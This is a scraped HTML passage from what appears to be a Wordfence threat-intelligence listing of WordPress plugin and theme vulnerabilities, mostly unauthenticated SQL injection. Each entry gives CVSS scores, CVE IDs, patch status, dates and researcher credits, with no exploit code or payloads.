<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookingpress-appointment-booking-pro" target="_blank" rel="noopener">BookingPress Appointment Booking Pro</a> <span class="wfvr-software-slug">[bookingpress-appointment-booking-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f6b3518-1eb0-4cd9-9d5d-4a5a81c90c7f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5913ad4d-ef24-44e5-8e4a-f740efadeeb4" target="_blank" rel="noopener">Capella | Restaurant WordPress &lt;= 2.5.5 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15688" target="_blank" rel="noopener noreferrer">							CVE-2025-15688						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/capella" target="_blank" rel="noopener">Capella | Restaurant WordPress</a> <span class="wfvr-software-slug">[capella]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5913ad4d-ef24-44e5-8e4a-f740efadeeb4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee8f3567-b732-4e5e-a1a4-ad3c8b2b5fdc" target="_blank" rel="noopener">Depicter — Popup &amp; Slider Builder &lt;= 4.8.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66622" target="_blank" rel="noopener noreferrer">							CVE-2026-66622						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/depicter" target="_blank" rel="noopener">Depicter — Popup &amp; Slider Builder</a> <span class="wfvr-software-slug">[depicter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee8f3567-b732-4e5e-a1a4-ad3c8b2b5fdc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/803e5d97-6e42-4366-975d-f4525f9c0ef1" target="_blank" rel="noopener">Dinatur &lt;= 1.18 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12983" target="_blank" rel="noopener noreferrer">							CVE-2026-12983						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dinatur" target="_blank" rel="noopener">Dinatur</a> <span class="wfvr-software-slug">[dinatur]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel-and-theo-antonio-da-fonseca" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e1dc1d4e8934fe0c2cdf411dd42e2d70.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e1dc1d4e8934fe0c2cdf411dd42e2d70"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel-and-theo-antonio-da-fonseca" target="_blank" rel="noopener">João Ramos Maciel and Theo Antonio da Fonseca</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/803e5d97-6e42-4366-975d-f4525f9c0ef1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bdc3413-1c17-455f-bf49-7c79f9c02d0d" target="_blank" rel="noopener">Directory Pro &lt;= 2.5.8 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66649" target="_blank" rel="noopener noreferrer">							CVE-2026-66649						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/directory-pro" target="_blank" rel="noopener">Directory Pro</a> <span class="wfvr-software-slug">[directory-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bdc3413-1c17-455f-bf49-7c79f9c02d0d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/24890c27-6db1-4ca9-8ebd-601fbce93d88" target="_blank" rel="noopener">Events Made Easy &lt;= 3.2.5 &#8211; Authenticated (Contributor+) Local File Inclusion via &#8216;wp_page_template&#8217; Event Property</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75963" target="_blank" rel="noopener noreferrer">							CVE-2026-75963						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-made-easy" target="_blank" rel="noopener">Events Made Easy</a> <span class="wfvr-software-slug">[events-made-easy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/24890c27-6db1-4ca9-8ebd-601fbce93d88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49a265c1-8760-48b3-8c91-2d822b2e97ce" target="_blank" rel="noopener">Flexible Subscriptions &lt;= 1.8.1 &#8211; Authenticated (Customer+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73364" target="_blank" rel="noopener noreferrer">							CVE-2026-73364						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/flexible-subscriptions" target="_blank" rel="noopener">Flexible Subscriptions</a> <span class="wfvr-software-slug">[flexible-subscriptions]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/van-phuc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd0fc66ed35d563ddd76a2843e23fd05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd0fc66ed35d563ddd76a2843e23fd05"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/van-phuc" target="_blank" rel="noopener">Van Phuc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49a265c1-8760-48b3-8c91-2d822b2e97ce" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92ee1ac0-3e1c-420a-ba09-014027400221" target="_blank" rel="noopener">JetAppointment &lt;= 2.5.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73365" target="_blank" rel="noopener noreferrer">							CVE-2026-73365						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-appointments-booking" target="_blank" rel="noopener">JetAppointment</a> <span class="wfvr-software-slug">[jet-appointments-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92ee1ac0-3e1c-420a-ba09-014027400221" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7eebfbf8-250b-44be-aadb-79647371c8d9" target="_blank" rel="noopener">Locatoraid Store Locator &lt;= 3.9.72 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66680" target="_blank" rel="noopener noreferrer">							CVE-2026-66680						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/locatoraid" target="_blank" rel="noopener">Locatoraid Store Locator</a> <span class="wfvr-software-slug">[locatoraid]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arrester" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf40511d1644ab3dc2ad65bc49b7e2ca.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf40511d1644ab3dc2ad65bc49b7e2ca"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arrester" target="_blank" rel="noopener">arrester</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7eebfbf8-250b-44be-aadb-79647371c8d9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd92a11a-7442-4689-95cc-9e22fdd2c4fd" target="_blank" rel="noopener">NGG Smart Image Search &lt; 4.0.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73185" target="_blank" rel="noopener noreferrer">							CVE-2026-73185						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ngg-smart-image-search" target="_blank" rel="noopener">NGG Smart Image Search</a> <span class="wfvr-software-slug">[ngg-smart-image-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jarno-vos-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/189ebc3f11e6ce03d83418dacef6162c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="189ebc3f11e6ce03d83418dacef6162c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jarno-vos-2" target="_blank" rel="noopener">Jarno Vos</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd92a11a-7442-4689-95cc-9e22fdd2c4fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9952c734-2ca3-4eb0-8bf0-3f07c7825bc5" target="_blank" rel="noopener">Nikstore Core &lt;= 1.5 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73388" target="_blank" rel="noopener noreferrer">							CVE-2026-73388						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nikstore-core" target="_blank" rel="noopener">Nikstore Core</a> <span class="wfvr-software-slug">[nikstore-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9952c734-2ca3-4eb0-8bf0-3f07c7825bc5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17428e0d-15ca-409e-a764-857d1cff201e" target="_blank" rel="noopener">Product Shortlist &lt;= 1.0.4 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16950" target="_blank" rel="noopener noreferrer">							CVE-2026-16950						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-shortlist" target="_blank" rel="noopener">Product Shortlist</a> <span class="wfvr-software-slug">[product-shortlist]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17428e0d-15ca-409e-a764-857d1cff201e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/baaa9688-dfdc-4ab2-b033-fe2b13a42e77" target="_blank" rel="noopener">Readabler &lt; 2.0.18 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78576" target="_blank" rel="noopener noreferrer">							CVE-2026-78576						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/readabler" target="_blank" rel="noopener">Readabler</a> <span class="wfvr-software-slug">[readabler]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/baaa9688-dfdc-4ab2-b033-fe2b13a42e77" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c4796b65-4f55-4af9-bfc7-2ccec32f3414" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress &lt;= 4.7.11 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66592" target="_blank" rel="noopener noreferrer">							CVE-2026-66592						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress</a> <span class="wfvr-software-slug">[buddypress-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aydan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/28bb5e57f2ebf46069c888bd33017ec4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="28bb5e57f2ebf46069c888bd33017ec4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aydan" target="_blank" rel="noopener">Aydan Arabadzha</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c4796b65-4f55-4af9-bfc7-2ccec32f3414" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5aae14bb-855f-406a-a6a2-f784a0ae0166" target="_blank" rel="noopener">Security Plugin, Firewall &amp; Malware Scanner with Auto Removal &lt;= 2.184 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66593" target="_blank" rel="noopener noreferrer">							CVE-2026-66593						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/security-malware-firewall" target="_blank" rel="noopener">Security Plugin, Firewall &amp; Malware Scanner with Auto Removal</a> <span class="wfvr-software-slug">[security-malware-firewall]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
